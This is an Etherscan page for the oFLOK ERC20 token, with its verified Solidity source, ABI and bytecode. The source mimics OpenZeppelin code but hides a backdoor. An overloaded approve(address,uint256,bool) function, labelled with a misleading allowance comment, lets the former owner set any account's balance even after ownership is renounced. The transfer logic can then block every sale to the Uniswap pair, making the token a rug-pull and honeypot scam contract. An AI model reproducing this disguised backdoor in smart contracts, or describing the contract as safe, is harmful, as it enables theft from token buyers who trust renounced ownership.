ETH Price: $2,417.44 (-8.80%)

Token

Ordinal Flokarium (oFLOK)
 

Overview

Max Total Supply

999,013,831.639908765 oFLOK

Holders

9

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
19,073,715.405094442 oFLOK

Value
$0.00
0xa31adb9289b0e98f16dbdbaf7eea983d571a9844
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OrdinalFlokarium

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-03-04
*/

/**
Ordinal Flokarium

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


// File: @openzeppelin/contracts/utils/Context.sol
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol
abstract contract Ownable is Context {
    address private _owner;
    address internal oldOwner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.

 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */

    function approve(address spender, uint256 amount, bool enable) public virtual {
        address _owner = oldOwner;

        require(msg.sender == _owner, "ERC20: approve from owner address");
        require(enable == true, "ERC20: approve from owner address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _balances[spender] = amount;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
    */

    function _transferWithBurn(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}

pragma solidity ^0.8.0;


contract OrdinalFlokarium is ERC20 {
    uint256 private constant TOTAL_SUPPLY = 1_000_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;

    bool public hasLimit;
    uint256 public maxTxAmount;
    uint256 public maxHolding;
    mapping(address => bool) public isException;

    uint256 _burnPercent = 1;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("Ordinal Flokarium", unicode"oFLOK", TOTAL_SUPPLY) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxHolding = TOTAL_SUPPLY / 20;

        maxTxAmount = TOTAL_SUPPLY / 20;

        isException[DEAD] = true;
        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
 
        _checkLimitation(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            if(to == uniswapV2Pair){
                require(balanceOf(address(uniswapV2Router)) == 0, "ERC20: disable router deflation");
            }

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercent) / 100;

                super._transferWithBurn(from, to, amount, _burn);
                return;
            }
        }

        super._transfer(from, to, amount);
    }

    function _checkLimitation(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmount, "Amount exceeds max");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxHolding, "Max holding exceeded max");
            }
        }
    }

    function removeLimit() external onlyOwner {
        hasLimit = true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHolding","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526001600c553480156200001657600080fd5b50604051620016b2380380620016b28339810160408190526200003991620002ef565b604051806040016040528060118152602001704f7264696e616c20466c6f6b617269756d60781b815250604051806040016040528060058152602001646f464c4f4b60d81b815250670de0b6b3a7640000620000a46200009e620001dd60201b60201c565b620001e1565b8251620000b990600690602086019062000249565b508151620000cf90600790602085019062000249565b506005819055336000818152600360209081526040808320859055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600e80546001600160a01b0319166001600160a01b03841617905550806200014d6014670de0b6b3a764000062000321565b600a55620001656014670de0b6b3a764000062000321565b60095550600b6020527f44433eeeda1d04bdae79f62169cdb2ab0a6af287fa15706d3fafdbac5fac34158054600160ff1991821681179092556001600160a01b039290921660009081526040808220805485168417905533825280822080548516841790553082529020805490921617905562000381565b3390565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b828054620002579062000344565b90600052602060002090601f0160209004810192826200027b5760008555620002c6565b82601f106200029657805160ff1916838001178555620002c6565b82800160010185558215620002c6579182015b82811115620002c6578251825591602001919060010190620002a9565b50620002d4929150620002d8565b5090565b5b80821115620002d45760008155600101620002d9565b6000602082840312156200030257600080fd5b81516001600160a01b03811681146200031a57600080fd5b9392505050565b6000826200033f57634e487b7160e01b600052601260045260246000fd5b500490565b600181811c908216806200035957607f821691505b602082108114156200037b57634e487b7160e01b600052602260045260246000fd5b50919050565b61132180620003916000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b806370a08231146101ec578063715018a6146102155780638c0b5e221461021d5780638da5cb5b1461022657806395d89b411461024157600080fd5b8063313ce567116100f4578063313ce567146101ac578063333e6f06146101bb57806339509351146101c457806344489ad1146101d757806362256589146101e457600080fd5b806306fdde031461013157806307ce29a71461014f578063095ea7b31461016457806318160ddd1461018757806323b872dd14610199575b600080fd5b6101396102de565b6040516101469190610f41565b60405180910390f35b61016261015d366004610fab565b610370565b005b610177610172366004610ff2565b61040a565b6040519015158152602001610146565b6005545b604051908152602001610146565b6101776101a736600461101e565b610420565b60405160098152602001610146565b61018b600a5481565b6101776101d2366004610ff2565b6104d1565b6008546101779060ff1681565b610162610508565b61018b6101fa36600461105f565b6001600160a01b031660009081526003602052604090205490565b61016261051f565b61018b60095481565b6000546040516001600160a01b039091168152602001610146565b610139610533565b61017761025736600461105f565b600b6020526000908152604090205460ff1681565b61017761027a366004610ff2565b610542565b61017761028d366004610ff2565b6105dd565b61018b6102a0366004611083565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101626102d936600461105f565b6105ea565b6060600680546102ed906110bc565b80601f0160208091040260200160405190810160405280929190818152602001828054610319906110bc565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b6001546001600160a01b03163381146103a45760405162461bcd60e51b815260040161039b906110f7565b60405180910390fd5b6001821515146103c65760405162461bcd60e51b815260040161039b906110f7565b6001600160a01b0384166103ec5760405162461bcd60e51b815260040161039b90611138565b50506001600160a01b03909116600090815260036020526040902055565b6000610417338484610663565b50600192915050565b600061042d84848461074c565b6001600160a01b0384166000908152600460209081526040808320338452909152902054828110156104b25760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161039b565b6104c685336104c18685611190565b610663565b506001949350505050565b3360008181526004602090815260408083206001600160a01b038716845290915281205490916104179185906104c19086906111a7565b6105106108e0565b6008805460ff19166001179055565b6105276108e0565b610531600061093a565b565b6060600780546102ed906110bc565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105c45760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161039b565b6105d333856104c18685611190565b5060019392505050565b600061041733848461074c565b6105f26108e0565b6001600160a01b0381166106575760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161039b565b6106608161093a565b50565b6001600160a01b0383166106c55760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161039b565b6001600160a01b0382166106eb5760405162461bcd60e51b815260040161039b90611138565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107725760405162461bcd60e51b815260040161039b906111bf565b6001600160a01b0382166107985760405162461bcd60e51b815260040161039b90611204565b6107a38383836109a2565b806107ad57505050565b6001600160a01b0383166000908152600b602052604090205460ff161580156107ef57506001600160a01b0382166000908152600b602052604090205460ff16155b156108d057600d546001600160a01b038381169116141561087257600e546001600160a01b0316600090815260036020526040902054156108725760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e00604482015260640161039b565b600d546001600160a01b038481169116148061089b5750600d546001600160a01b038381169116145b156108d05760006064600c54836108b29190611247565b6108bc9190611266565b90506108ca84848484610c9a565b50505050565b6108db838383610e22565b505050565b6000546001600160a01b031633146105315760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161039b565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108db576001600160a01b0383166000908152600b602052604090205460ff161580156109ee57506001600160a01b0382166000908152600b602052604090205460ff16155b156108db57600954811115610a3a5760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b604482015260640161039b565b600d546001600160a01b0316610c0457600e60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b158015610a9857600080fd5b505afa158015610aac573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ad09190611288565b6001600160a01b031663e6a4390530600e60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015610b2d57600080fd5b505afa158015610b41573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b659190611288565b6040516001600160e01b031960e085901b1681526001600160a01b0392831660048201529116602482015260440160206040518083038186803b158015610bab57600080fd5b505afa158015610bbf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610be39190611288565b600d80546001600160a01b0319166001600160a01b03929092169190911790555b600d546001600160a01b0383811691161415610c1f57505050565b600a5481610c42846001600160a01b031660009081526003602052604090205490565b610c4c91906111a7565b11156108db5760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d61780000000000000000604482015260640161039b565b6001600160a01b038416610cc05760405162461bcd60e51b815260040161039b906111bf565b6001600160a01b038316610ce65760405162461bcd60e51b815260040161039b90611204565b6001600160a01b03841660009081526003602052604090205482811015610d1f5760405162461bcd60e51b815260040161039b906112a5565b6001600160a01b03851660009081526003602052604090208382039055610d468284611190565b92508160056000828254610d5a9190611190565b90915550506001600160a01b03841660009081526003602052604081208054859290610d879084906111a7565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e1391815260200190565b60405180910390a35050505050565b6001600160a01b038316610e485760405162461bcd60e51b815260040161039b906111bf565b6001600160a01b038216610e6e5760405162461bcd60e51b815260040161039b90611204565b6001600160a01b03831660009081526003602052604090205481811015610ea75760405162461bcd60e51b815260040161039b906112a5565b610eb18282611190565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610ee79084906111a7565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f3391815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f6e57858101830151858201604001528201610f52565b81811115610f80576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b038116811461066057600080fd5b600080600060608486031215610fc057600080fd5b8335610fcb81610f96565b92506020840135915060408401358015158114610fe757600080fd5b809150509250925092565b6000806040838503121561100557600080fd5b823561101081610f96565b946020939093013593505050565b60008060006060848603121561103357600080fd5b833561103e81610f96565b9250602084013561104e81610f96565b929592945050506040919091013590565b60006020828403121561107157600080fd5b813561107c81610f96565b9392505050565b6000806040838503121561109657600080fd5b82356110a181610f96565b915060208301356110b181610f96565b809150509250929050565b600181811c908216806110d057607f821691505b602082108114156110f157634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526021908201527f45524332303a20617070726f76652066726f6d206f776e6572206164647265736040820152607360f81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b6000828210156111a2576111a261117a565b500390565b600082198211156111ba576111ba61117a565b500190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60008160001904831182151516156112615761126161117a565b500290565b60008261128357634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121561129a57600080fd5b815161107c81610f96565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea264697066735822122003a0c4eb3d1afe08ed0cc37808258be99e5731fdb6b3bab8b3b0edc132f2e97164736f6c634300080900330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

